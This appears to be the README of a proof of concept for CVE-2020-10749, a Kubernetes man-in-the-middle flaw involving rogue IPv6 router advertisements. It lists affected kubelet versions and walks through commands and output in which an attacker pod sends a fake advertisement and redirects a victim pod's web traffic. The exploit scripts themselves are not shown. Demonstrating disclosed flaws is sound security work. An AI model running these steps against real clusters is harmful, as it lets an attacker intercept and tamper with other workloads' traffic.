CVE-2020-10749 PoC (Kubernetes MitM attacks via IPv6 rogue router advertisements)
For educational purposes only
- Kubernetes cluster with the following kubelet version
- kubelet v1.18.0-v1.18.3
- kubelet v1.17.0-v1.17.6
- kubelet < v1.16.11
$ kubectl apply -f victim/victim.yml
$ kubectl ge pods
NAME READY STATUS RESTARTS AGE
victim-5484d9f977-pgtnh 1/1 Running 0 10s
$ kubectl exec -it victim-5484d9f977-pgtnh -- sh
/ # apk add curl
/ # ip -6 a show eth0
3: eth0@if25: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1450 state UP
inet6 fe80::3c07:afff:feb5:7219/64 scope link
valid_lft forever preferred_lft forever
/ # ip -6 route
fe80::/64 dev eth0 metric 256
ff00::/8 dev eth0 metric 256
$ curl http://example.com
$ kubectl apply -f attacker/attacker.yml
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
attacker-8857dd5c9-pnzjw 1/1 Running 0 50s
victim-5484d9f977-pgtnh 1/1 Running 0 10s
$ kubectl exec -it attacker-8857dd5c9-pnzjw -- sh
/ # ip a show eth0 | grep "link/ether" | awk '{print $2}'
aa:ca:d1:91:8f:23
/ # sed -i 's/\[YOUR_MAC_ADDR\]/aa:ca:d1:91:8f:23/g' fake_ra.py
/ # python fake_ra.py
Sending a fake router advertisement message...
.
Sent 1 packets.
$ kubectl exec -it attacker-8857dd5c9-pnzjw -- sh
/ # python server.py
Listening...
Make sure that a new IPv6 address and the default gateway are added.
$ kubectl exec -it victim-5484d9f977-pgtnh -- sh
/ # ip -6 a show eth0
3: eth0@if27: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1450 state UP
inet6 2001:db8:1:0:1854:9aff:fe75:2368/64 scope global dynamic
valid_lft forever preferred_lft forever
inet6 fe80::1854:9aff:fe75:2368/64 scope link
valid_lft forever preferred_lft forever
/ # ip -6 route
2001:db8:1::/64 dev eth0 metric 256
fe80::/64 dev eth0 metric 256
default via fe80::42:fcff:dead:beef dev eth0 metric 1024 expires 0sec
ff00::/8 dev eth0 metric 256
/ # curl http://example.com
malicious!!!!!!!
Teppei Fukuda